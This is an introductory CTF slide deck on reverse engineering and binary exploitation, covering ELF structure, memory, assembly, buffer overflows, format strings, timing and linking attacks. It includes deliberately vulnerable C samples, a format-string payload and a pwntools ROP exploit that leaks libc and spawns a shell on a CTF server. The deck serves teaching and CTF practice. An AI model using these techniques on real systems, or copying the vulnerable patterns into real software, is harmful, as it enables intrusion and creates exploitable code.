Reverse Engineering & Exploitation (pwn) - 101
Who Am I?
Graduated from UMD in '19 with a BS in CS. Involved in CSEC and helped create challenges for UMDCTF-2018/19.
Now I have to be an adult and work my life away, but I still love CTFs and connecting with the community! (And we love our jobs! #cyberroolz)
Mike - WittsEnd2
Software Engineer - C, Python, & Web
Reverse Engineer
Graduate Student - M. Eng. Cyber Sec.
Hobbies: CTFs/Dev Projects, Entrepreneurship, Baseball, Music, Stocks
How to Reach Me
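#include <stdio.h>
#include <stdlib.h>
typedef struct Contact {
  char discord[32]; // <- best way to contact me
  char twitter[32];
  char github[32];
} Contact;
Contact *shareContact(void) {
  Contact *contactInfo = malloc(sizeof(Contact));
  if (contactInfo == NULL)
    return NULL;
  // Arrays cannot be assigned with '='; copy each string with a size bound.
  snprintf(contactInfo->discord, sizeof contactInfo->discord, "%s", "WittsEnd2#9274");
  snprintf(contactInfo->twitter, sizeof contactInfo->twitter, "%s", "@RagnarSecurity");
  snprintf(contactInfo->github, sizeof contactInfo->github, "%s", "WittsEnd2");
  return contactInfo; // caller is responsible for free()
}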
Agenda
- Define Reverse Engineering and Exploitation (pwn)
- Understanding How Files Are Compiled
- Memory
- Analysis and Assembly
- Vulnerabilities
- Additional Tools
What the F*** is pwn and Reverse Engineering?
Definition 1: It's Magic
Reverse Engineering
A process of extracting knowledge from engineered artifacts.
Binary Exploitation
Binary exploitation is the process of subverting a compiled application such that it violates some trust boundary in a way that is advantageous to the attacker.
The Header
The header contains the blueprint to the program you are analyzing!
Layout of a Compiled ELF File
Contains data about linking and execution
An array of entries, each describing a segment or other information about the file
Segments contain either code or data, related to the program's execution.
The section header table has all of the information necessary to locate and isolate each of the file's sections.
ELF Header
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shstrndx;
} Elf32_Ehdr;
$ readelf -h a.out ###Output modified slightly
Magic: 7f 45 4c 46 \x7fELF
Class: ELF32
Data: little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048430
Start of program headers: 52
Start of section headers: 8588
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 35
Section header string table index: 34
e_ -- elf
ph -- program header
sh -- section header
off -- offset
ent -- entry
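The first bytes of e_ident are enough to tell whether a file is an ELF and whether it is 32-bit or 64-bit. Below is a minimal sketch of that check. The helper name elf_class_bits and the local macro names are made up for this example; the magic bytes and the class byte at e_ident[4] (1 = ELF32, 2 = ELF64) come from the ELF specification.

```c
#include <stddef.h>
#include <string.h>

/* Values from the ELF specification's e_ident layout.
 * The macro names are local to this sketch. */
#define IDENT_CLASS_OFFSET 4 /* e_ident[EI_CLASS] */
#define CLASS_ELF32        1 /* ELFCLASS32 */
#define CLASS_ELF64        2 /* ELFCLASS64 */

/* Hypothetical helper: returns 32 or 64 for a valid ELF ident, 0 otherwise. */
int elf_class_bits(const unsigned char *ident, size_t len)
{
    static const unsigned char magic[4] = { 0x7f, 'E', 'L', 'F' };

    if (ident == NULL || len < 5)
        return 0;
    if (memcmp(ident, magic, sizeof magic) != 0)
        return 0; /* not an ELF file */

    switch (ident[IDENT_CLASS_OFFSET]) {
    case CLASS_ELF32: return 32;
    case CLASS_ELF64: return 64;
    default:          return 0;
    }
}
```

Feeding it the first 16 bytes of a file read with fread() would reproduce the "Magic" and "Class" lines that readelf -h prints.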
Section Header
TRY:
$ readelf -S /bin/bash
### modified output
[Nr] Name Type
[ 0] NULL
[ 1] .interp PROGBITS
[ 2] .note.ABI-tag NOTE
[ 3] .note.gnu.build-i NOTE
[ 4] .gnu.hash GNU_HASH
[ 5] .dynsym DYNSYM
[ 6] .dynstr STRTAB
[ 7] .gnu.version VERSYM
[ 8] .gnu.version_r VERNEED
[ 9] .rela.dyn RELA
[10] .rela.plt RELA
[11] .init PROGBITS
[12] .plt PROGBITS
[13] .plt.got PROGBITS
[14] .text PROGBITS
[15] .fini PROGBITS
[16] .rodata PROGBITS
[17] .eh_frame_hdr PROGBITS
[18] .eh_frame PROGBITS
[19] .init_array INIT_ARRAY
[20] .fini_array FINI_ARRAY
[21] .data.rel.ro PROGBITS
[22] .dynamic DYNAMIC
[23] .got PROGBITS
[24] .data PROGBITS
[25] .bss NOBITS
[26] .gnu_debuglink PROGBITS
[27] .shstrtab STRTAB
What is a section header?
What are some sections that are useful to us?
.text
.got
.data
A well-defined header that describes one section of the binary; the section contents themselves are unstructured.
Program Header
Program headers indicate how the segments required for execution are to be loaded into virtual memory.
There is a section-to-segment mapping that specifies which sections are part of which segments.
Most disassemblers recreate this layout and do all of their analysis based on virtual addresses.
More ELF File Info:
https://slides.com/drakemp/hacs408e-elf
More PE File Info:
https://slides.com/drakemp/hacs408e-pe
Memory
Paging
Organizes memory (or disk) into chunks
Typically between 512 bytes and 8192 bytes
Page Table
Groups Tables Together
A page that contains pointers to Pages
How Addresses Are Built
[Page Pointer][Intermediate][Offset]
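As a rough illustration of the [Page Pointer][Intermediate][Offset] layout, the sketch below splits a 32-bit virtual address into three fields. It assumes the classic x86 two-level scheme with 4 KiB pages (10 bits, 10 bits, 12 bits); other architectures and page sizes divide the bits differently. The struct and function names are made up for this example.

```c
#include <stdint.h>

/* Assumed split: 10-bit directory index, 10-bit table index, 12-bit offset. */
typedef struct {
    uint32_t dir_index;   /* "Page Pointer": which page table to use */
    uint32_t table_index; /* "Intermediate": which page inside that table */
    uint32_t offset;      /* byte offset inside the 4 KiB page */
} VAddrParts;

VAddrParts split_vaddr(uint32_t vaddr)
{
    VAddrParts p;
    p.dir_index   = vaddr >> 22;            /* top 10 bits */
    p.table_index = (vaddr >> 12) & 0x3ffu; /* middle 10 bits */
    p.offset      = vaddr & 0xfffu;         /* low 12 bits */
    return p;
}
```

For the entry point 0x8048430 from the readelf output earlier, this gives directory index 32, table index 72, and offset 0x430.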
Paging Algorithms
- First-in First-out (FIFO)
  - Performs poorly in practical applications
  - Many variations, e.g. second chance
- Least Recently Used (LRU)
  - Tracks page usage over short period of time
  - Near optimal performance… in theory
  - Can be expensive to implement
- Random
  - Performs better than FIFO!
  - Fallback algorithm when LRU degrades
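To make the FIFO behaviour concrete, here is a small simulation that counts page faults for a sequence of page references. It is only a sketch: fifo_page_faults and MAX_FRAMES are names invented for this example, and a real kernel tracks far more state than a flat array.

```c
#include <stddef.h>

#define MAX_FRAMES 16 /* arbitrary cap for this sketch */

/* Counts page faults for FIFO replacement with `frames` physical frames.
 * Returns 0 if `frames` is 0 or larger than MAX_FRAMES. */
size_t fifo_page_faults(const int *refs, size_t n, size_t frames)
{
    int resident[MAX_FRAMES];
    size_t used = 0, next_victim = 0, faults = 0;

    if (frames == 0 || frames > MAX_FRAMES)
        return 0;

    for (size_t i = 0; i < n; i++) {
        int hit = 0;
        for (size_t j = 0; j < used; j++) {
            if (resident[j] == refs[i]) {
                hit = 1;
                break;
            }
        }
        if (hit)
            continue;

        faults++;
        if (used < frames) {
            resident[used++] = refs[i]; /* free frame available */
        } else {
            resident[next_victim] = refs[i]; /* evict the oldest page */
            next_victim = (next_victim + 1) % frames;
        }
    }
    return faults;
}
```

With the reference string 1,2,3,4,1,2,5,1,2,3,4,5, three frames give 9 faults while four frames give 10. More memory producing more faults (Belady's anomaly) is one reason FIFO does poorly in practice.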
Memory Layout - 32 Bit
Primary places we work with memory are...
- Stack
- Heap
BSS Section
Uninitialized Static and Global Variables
Data Section
Initialized Static and Global Variables
The Stack - 32 bit
We are assuming integers and Intel Architecture in this example
Local Var 1
Local Var 3
Local Var 2
Param 3
Param 2
Param 1
Data Structures
ebp
ret
param1
int var 1
int arr[2]
int arr[1]
int arr[0]
int arr[3]
Important Things To Know
- Size of Types of Data (int, float, etc.)
- Pointers
- Structs & Linked List
- Arrays
Register
- The processor's "memory"
- Data that is extremely fast to access
- Doesn't hold a lot of data
- Can access portions of registers too
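"Portions of registers" on x86 means names like AX, AH, and AL, which refer to slices of EAX. The sketch below models those slices with masks and shifts on a plain 32-bit integer; the function names are made up for this example and no real register is touched.

```c
#include <stdint.h>

/* AX is the low 16 bits of EAX. */
uint16_t reg_ax(uint32_t eax) { return (uint16_t)(eax & 0xffffu); }

/* AL is the low 8 bits of EAX (and of AX). */
uint8_t reg_al(uint32_t eax) { return (uint8_t)(eax & 0xffu); }

/* AH is bits 8..15 of EAX, i.e. the high byte of AX. */
uint8_t reg_ah(uint32_t eax) { return (uint8_t)((eax >> 8) & 0xffu); }
```

If EAX holds 0x12345678, then AX is 0x5678, AH is 0x56, and AL is 0x78.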
Static And Dynamic Analysis
Static
Learning how programs behave without running the executable.
- Lots of assembly.
- Requires disassembler.
- The "cool" way of reversing.
- Should be last resort (unless you have source code).
Dynamic
Learning how programs behave by running the executable.
- Use of debuggers and tools like strace/ltrace.
- Can help pinpoint errors and spots for further analysis.
- Helpful to have knowledge of static analysis to complement it.
Assembly
Byte Code That is Human Readable
- Required to do RE
- Many architectures: (x86, ARM)
- Two primary syntaxes: Intel and AT&T
- Intel: inst dest, src1, src2, ...
- AT&T: inst src1, src2, ..., dest
Processor manuals are your friend!
PUSH EBP
MOV EBP,ESP
AND ESP,0xfffffff0
SUB ESP,0x20
CMP dword ptr [EBP + param_1],0x2
JLE LAB_0804852c
MOV EAX,dword ptr [EBP + param_2]
ADD EAX,0x4
MOV EAX,dword ptr [EAX]
MOV dword ptr [ESP]=>local_30,EAX
CALL atoi ; int atoi(char * __nptr)
MOV dword ptr [ESP + local_18],EAX
MOVSX ECX,AX
MOV EDX,dword ptr [ESP + local_18]
MOV EAX,dword ptr [ESP + local_14]
MOV dword ptr [ESP + local_24],ECX
MOV dword ptr [ESP + local_28],EDX
MOV dword ptr [ESP + local_2c],EAX
MOV dword ptr [ESP]=>local_30,s_%d_*_%d_==_%d_0804 = "%d * %d == %d\n"
CALL printf ; int printf(char * __format, ...)
JMP LAB_0804859c
LAB_08048590
MOV dword ptr [ESP]=>local_30,s_Something_went_hor = "Something went horribly wrong"
CALL puts ; int puts(char * __s)
LAB_0804859c
MOV EAX,0x0
LAB_080485a1
LEAVE
RET
Exploitation (pwn)
Buffer Overflow
- Overwriting Memory To Get Desired Execution.
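- Caused by unbounded (or wrongly bounded) writes into a fixed-size buffer
- gets (never checks the buffer size)
- printf family (sprintf writes with no bound; printf itself is covered under Format String)
- fgets (only when the size argument is larger than the buffer)
- Can be either stack or heap based - How are they different?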
Input
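#include <stdio.h>
int main() {
  char buff[12];
  // Intentionally vulnerable: gets() never checks the 12-byte bound
  // (it was removed from the language in C11 for this reason).
  gets(buff);
  return 0;
}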
Overwrite the original return address so that it points to either shellcode or another address in the program.
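The overwrite can be modelled without triggering real undefined behaviour by treating a stack frame as a byte array. The sketch below assumes a hypothetical layout of a 12-byte buffer, then 4 bytes of saved EBP, then the 4-byte return address; real compilers may add padding or canaries, so treat the offsets as illustrative only. All names are made up for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE   12                 /* char buff[12] */
#define RET_OFFSET (BUF_SIZE + 4)     /* buffer, then saved EBP, then ret */
#define FRAME_SIZE (RET_OFFSET + 4)

/* Copies `input` into a simulated frame without respecting BUF_SIZE and
 * returns the (possibly clobbered) return address stored in the frame. */
uint32_t simulate_overflow(const unsigned char *input, size_t len)
{
    unsigned char frame[FRAME_SIZE];
    const uint32_t original_ret = 0x08048430u; /* arbitrary example value */

    memset(frame, 0, sizeof frame);
    for (int i = 0; i < 4; i++) /* store ret little-endian, as on x86 */
        frame[RET_OFFSET + i] = (unsigned char)(original_ret >> (8 * i));

    /* The "bug": the copy is bounded by the frame, not by the buffer. */
    if (len > sizeof frame)
        len = sizeof frame;
    memcpy(frame, input, len);

    return (uint32_t)frame[RET_OFFSET]
         | (uint32_t)frame[RET_OFFSET + 1] << 8
         | (uint32_t)frame[RET_OFFSET + 2] << 16
         | (uint32_t)frame[RET_OFFSET + 3] << 24;
}
```

Twelve bytes of input leave the return address intact; sixteen filler bytes followed by ef be ad de replace it with 0xdeadbeef.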
Format String
- Occurs when the submitted data of an input string is evaluated as a command by the application.
- Evaluate the stack via common format strings (e.g. %x, %s, %p)
- Write attacker-chosen values to memory using %n
  - Stores the number of bytes written so far into the int* argument
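#include <stdio.h>
int main(int argc, char **argv)
{
  if (argc < 2)
    return 1;
  // This line is safe: the input is only ever treated as data
  printf("%s\n", argv[1]);
  // This line is vulnerable: the input is used as the format string
  printf(argv[1]);
  return 0;
}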
Let's say our payload is: ABCDABCD %p.%p.%261$p.%4n. This effectively performs the write *0x44434241 = 35.
Why is that?
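The key ingredient is what %n does: it stores the number of bytes produced so far through a pointer taken from the argument list. The sketch below shows that behaviour in a benign setting where the format string is a constant and the pointer is one we control. The function name is made up for this example, and it assumes a C library that honours %n (glibc does; some platforms disable it).

```c
#include <stdio.h>

/* Returns how many bytes had been produced when %n was reached.
 * `text` should be shorter than the 64-byte scratch buffer. */
int bytes_before_n(const char *text)
{
    char out[64];
    int written = -1;

    /* %n writes the running byte count into `written`. */
    snprintf(out, sizeof out, "%s%n", text, &written);
    return written;
}
```

In the vulnerable printf(argv[1]) case nobody passes a pointer, so %n takes whatever value sits at that argument position on the stack. If the attacker's own bytes (ABCD, i.e. 0x44434241 in little-endian) land there, the count is written to that address.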
Timing Attacks
- Based on either delays or inconsistencies in execution time.
- If we know how long it takes for the thing we want to execute, we can use that to attack the software.
#include <stdbool.h>
#include <stddef.h>
bool insecureStringCompare(const void *a, const void *b, size_t length) {
  const char *ca = a, *cb = b;
  for (size_t i = 0; i < length; i++)
    if (ca[i] != cb[i])
      return false; // early exit: run time depends on where the first mismatch is
  return true;
}
bool constantTimeStringCompare(const void *a, const void *b, size_t length) {
  const char *ca = a, *cb = b;
  bool result = true;
  for (size_t i = 0; i < length; i++)
    result &= (ca[i] == cb[i]); // accumulate equality; every byte is always visited
  return result;
}
Which is vulnerable?
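One way to see the answer without a stopwatch is to count how many bytes an early-exit comparison looks at before it returns. The helper below is a made-up instrumented variant written for this example; the count stands in for execution time.

```c
#include <stddef.h>

/* Mimics an early-exit compare, but returns how many bytes were examined.
 * More work means the guess matched a longer prefix of the secret. */
size_t bytes_examined_early_exit(const void *a, const void *b, size_t length)
{
    const unsigned char *ca = a, *cb = b;
    size_t examined = 0;

    for (size_t i = 0; i < length; i++) {
        examined++;
        if (ca[i] != cb[i])
            break; /* stops at the first mismatch */
    }
    return examined;
}
```

Comparing "SECRET" against "XECRET" examines 1 byte, against "SEXRET" 3 bytes, and against "SECREX" all 6. An attacker who can measure that difference can recover the secret one byte at a time, which is why the comparison that always walks the full length is the safer one.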
Linking Attacks
What is linking?
- Linking allows the program to execute code that lives outside the binary (shared libraries).
- Reduces the size of the program, and compilation time.
- Linux: .so
- Windows: .dll
Common Linked Functions:
- printf
- puts
- atoi
- etc...
Linking Attacks
We redefine what the binary's linked symbols resolve to, so that we can trick it into executing what we want!
Essentially, we insert malicious code in place of where valid code should be.
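A dynamically linked call such as puts goes through a table of function pointers (the .got section seen earlier), so changing one entry changes what the call executes. The sketch below imitates that with an ordinary function pointer. It is a simulation only: every name is made up, and no real GOT is modified.

```c
#include <stddef.h>

typedef int (*puts_fn)(const char *);

/* Stand-in for the real library function. */
int real_puts_stub(const char *s) { (void)s; return 0; }

/* Stand-in for attacker-controlled code. */
int attacker_stub(const char *s) { (void)s; return 1337; }

/* One-slot imitation of a GOT entry for puts. */
static puts_fn fake_got_puts = real_puts_stub;

/* What the program does: an indirect call through the table. */
int call_puts_via_got(const char *s) { return fake_got_puts(s); }

/* What the attack does: repoint the entry. */
void overwrite_got_entry(puts_fn target) { fake_got_puts = target; }
```

Before the overwrite, call_puts_via_got("hi") reaches real_puts_stub and returns 0; after overwrite_got_entry(attacker_stub), the same call returns 1337 even though the calling code never changed.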
Tools
Debuggers
Disassemblers
- IDA Pro
- Ghidra
- Binary Ninja
- Radare2
- Cutter
Translates machine code to assembly (or even C code).
pwntools
- Framework to make exploitation easier
- Commonly used for ctf challenges
- ROP Chain Builder (no need to look for gadgets).
- Format String Builder
http://docs.pwntools.com/en/stable/
from pwn import *
context(os='linux', arch='amd64')
# p = process('./return-to-what')  # uncomment for local testing
p = remote('chal.duc.tf', 30003)
binary = ELF('./return-to-what')
rop = ROP(binary)
libc = ELF('./libc6_2.27-3ubuntu1_amd64.so')
junk = b'A'*56  # padding up to the saved return address
# Stage 1: call puts(puts@GOT) to leak a libc address, then return to vuln
rop.puts(binary.got['puts'])
rop.call(binary.symbols['vuln'])
log.info("Stage 1 ROP chain:\n" + str(rop.dump()))
stage1 = junk + rop.chain()
p.recvuntil(b'Where would you like to return to?')
p.sendline(stage1)
p.recvline()
# The leaked pointer is shorter than 8 bytes, so pad it before unpacking
leaked_puts = p.recvline()[:8].strip().ljust(8, b'\x00')
log.success("Leaked puts@GLIBC: " + str(leaked_puts))
leaked_puts = u64(leaked_puts)
# Rebase libc so that its symbols resolve to runtime addresses
libc.address = leaked_puts - libc.symbols['puts']
# Stage 2: system("/bin/sh") built from gadgets in libc
rop2 = ROP(libc)
rop2.system(next(libc.search(b'/bin/sh\x00')), 0, 0)
# rop2 = ROP(binary)
# rop2.call(libc.symbols['system'], (next(libc.search(b'/bin/sh\x00')), ))
log.info("Stage II ROP Chain: \n" + rop2.dump())
stageII = junk + rop2.chain()
p.recvuntil(b'Where would you like to return to?')
p.sendline(stageII)
p.recvline()
p.interactive()
The Giant List of Other Tools
- strace
- ltrace
- UPX
- WinDbg
- GDB
- PEDA
- GEF
- OllyDbg
- PEView
- readpe
- readelf
- Wireshark
- IDA
- Binary Ninja
- Cutter
- Radare2
- Ghidra
- angr
- capstone
Practice Problems
https://github.com/Ragnar-Security/Practice-Problems
Learn More
http://security.cs.rpi.edu/courses/binexp-spring2015/
https://slides.com/drakemp
https://slides.com/ragnarsecurity (will post more)
Do some CTFs
Works Cited
https://slides.com/drakemp
Allen Hazelton - ENPM696
Dharmalingam Ganesan - ENPM691 (Linking)
How To Pwn/Rev 101
By Ragnar Security